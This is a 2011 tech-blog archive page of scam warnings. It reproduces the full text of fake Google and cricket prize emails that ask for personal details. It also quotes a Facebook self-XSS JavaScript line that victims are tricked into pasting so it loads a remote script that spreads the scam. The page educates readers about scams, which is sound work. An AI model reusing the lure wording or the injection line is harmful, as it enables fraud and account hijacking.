Technology Feed Lab

technology site

Archive for November, 2011

Google 13th anniversary awards held in UK email spam

Posted by TechGeek on November 23, 2011

This is yet another spam email circulating over the internet. This time a big brand name Google is used by spammers with lot more details in order to convince victim to think if it is coming from real Google. The even mentioned by spam email says “Google 13th Anniversary Awards as organized by the Anniversary Centre of Google Inc., held on Sept. 27th, 2011 in the United Kingdom”.

The email has been written so well that people will convince thinking it’s a true event and may provide their personal information. Even the email says the prize won must be claimed by the email owner only, not later than 30 days from the date of notification.” The spam email comes with subject line “Award Notification!!” with sender as Google UK. Here are the contents of the email,


We are pleased to inform you that your email address attached to file No: G13/B-1/2011 with award reference no: GGL2011/244/M-13 has been selected to receive an award of Five Hundred Thousand Great British Pounds (£ 500,000.00) in the last batch of Google 13th Anniversary Awards as organized by the Anniversary Centre of Google Inc., held on Sept. 27th, 2011 in the United Kingdom.

Google Inc randomly selected 13 email addresses through a computer ballot system to receive £ 500,000.00 prize money each as a part of their for-profit philanthropic wing (GOOGLE.ORG) promotion. The prize won MUST be claimed by the email owner ONLY, not later than 30 days from the date of notification.

Send your complete personal information with your award ref. and file no. to enable us process your claim;

1. Full name:

2. Country :

3. Contact Address:

4. Telephone or Mobile:

5. Marital Status:

6. Occupation:

7. Sex:

8. Age:

9. Email:

 Dr. Barry Petko

Director of Operations, Google Claim Centre

Tel: +44 701 028 5565 or +44 871 315 0967

Fax: +44 870 495 6313 or +44 870 471 8742

Email: or

Please do not reply if you are NOT the owner of this email address.

Sincerely Yours,

Google Management

Larry Page and Sergey Brin (Founders of Google Inc.) committed 1% of Google’s equity, 1% of profits, employee time, and in-kind giving of products and services to doing good. Keep your award information confidential to avoid double claims.”

The last few lines are amazing and spammer even used the Google founder names. Avoid such emails and never share personal information over the email.

Posted in Online Scams | Tagged: , , , , , , , | 3 Comments »

International cricket world cup promotion 2011 email spam

Posted by TechGeek on November 23, 2011

Spammers continue to take advantages of brand names or events in order to lure victim into providing their personal information. Spammer collects email addresses from websites, forums, chatrooms, or newsgroups. This time the spammer used International Cricket World Cup promo 2011 event in order to spread the spam email.

The email comes with subject line “CONGRATUALTIONS!!!” Here are the content of the spam email,





TEL NUMBER:+ (+447017459960}+447014248130}

FAX NUMBER+44(701)002-8480









1 FULL NAME……………………………….,

2 FULL ADDRESS………………………….,

3 NATIONALITY……………………………,


5 MOBILE NUMBER………………………,

6 DATE OF BIRTH………………………….,

7 MARITAL STATUS………………………,

8 STATE/PROVINCE………………………,

9 OCCUPATION…………………………….,

10 SEX……………………………………………,



The email says that your email ID has own cash in international cricket world cup promotion and email has ICC logo attached. This is fake and ICC doesn’t host such events. Spammer also provided UK phone numbers with this email. If victim calls or sends his/her personal information, they can lose their money. Do not share any of your personal information over the emails with anyone.

Stay tuned for more such spams on the internet.

Posted in Online Scams | Tagged: , , , , , | 1 Comment »

Justin Bieber doing Drugs video scam spreading on Facebook

Posted by TechGeek on November 13, 2011

And new Facebook scams continue to spread with different messages. This time it is related to Justin Bieber doing Drugs video. We have again seen rise in such scams which popularly targets brand names like Twitter or famous celebrity like Justin Bieber. Scammers host a fake message on malicious servers and then ask victim to complete few surveys in order to see those fake videos. Here is wall post of affected friend,Justin Bieber doing DrugsWhen victim clicks on the above link to see the video, he/she will be taken to the fake website which hosts this video. Here is the page looks like, The malicious link in the wall post was shortened which reveals to “hxxp://”.After you click on Watch Now link, you will again taken to the new page which display YouTube like video in the background with comments. It will immediately display survey window. In order to see the video, you will have to complete surveys which will give money to scammers. Here is how it looks,

The URL is still live and so the scam. It is sad to see that despite of all warnings from different websites about these scams, people are still falling victim to such scams.

Don’t click on such links. Spread this with your friends and family.

Posted in Facebook | Tagged: , , , , , , , | Leave a Comment »

The fake pages spreading on Facebook, poses risk to users

Posted by TechGeek on November 11, 2011

We are observing a lot of fake pages being created on Facebook by attackers. The idea is to create fake pages and then verifying user by following some manual steps in order to reveal the secret video behind it. The manual steps does not reveal secret video rather it will spread the page with different messages like “WOW Check this out it is cool”, “OMG have you seen this??” or “Check this out.. It is awesome!” on your friend’s wall post. Here is how message spreads,

The above victim has posted messages to his all friends. Once you click on the link, you will be taken to Facebook page which looks like,

The page post a message like “warning only 18+ verify your age by following easy steps”. This has been done intentionally by the attacker in order to do his/her malicious activity behind. Once you click on continue button, it displays another animation with some instructions to follow. Here is how they look,

So when you type “J” on address bar and presses Ctrl+V, it will append malicious JavaScript which is “avascript:(a=(b=document).createElement(‘script’)).src=’’,b.body.appendChild(a);void(0)” to J letter which will create Javascript. So this JavaScript is responsible for spreading this message on your friend’s wall post.

Once you hit enter after pasting this script in the address bar, it will run the malicious code from “a.js” file. The code gathers all your friend’s and send them random message with link to this malicious page. The source code of  “a.js” is here. You can see the JavaScript code being used to post such messages.

Avoid visiting such pages on Facebook. Do not enter anything like JavaScript in the address bar and run it. Nothing will be revealed behind and you will become victim to such scams.

Please like us our page on Facebook and spread this blog.

Posted in Facebook | Tagged: , , , , , , , | Leave a Comment »

Free giveaway custom Twitter t-shirt scam Facebook

Posted by TechGeek on November 11, 2011

We came across another scam on Facebook and this time scammer had created a page on Facebook.  The scammers has targeted Twitter another networking site on Facebook. The scam message was to get a free custom Twitter t-shirt for free. The message used to spread was “Just registered to get my free Custom Twitter Tee free. Last day grab it now. Last day”.

Here is how wallpost looks like,

twitter tee scam

twitter tee scam

Unfortunately, the page is taken down by Facebook and we can’t able to get further information about this scam. But the idea is to convince victim by spreading such free giveaways messages on their wall post. We have seen such different scams on Facebook in the past and we will continue to see such scams in the future as well.

Facebook did a good job on immediately removing the page. The page is not reachable and you will be only redirected to home page of your profile. Remember, not to fall victim for such fake scams.

Posted in Facebook | Tagged: , , , , , | Leave a Comment »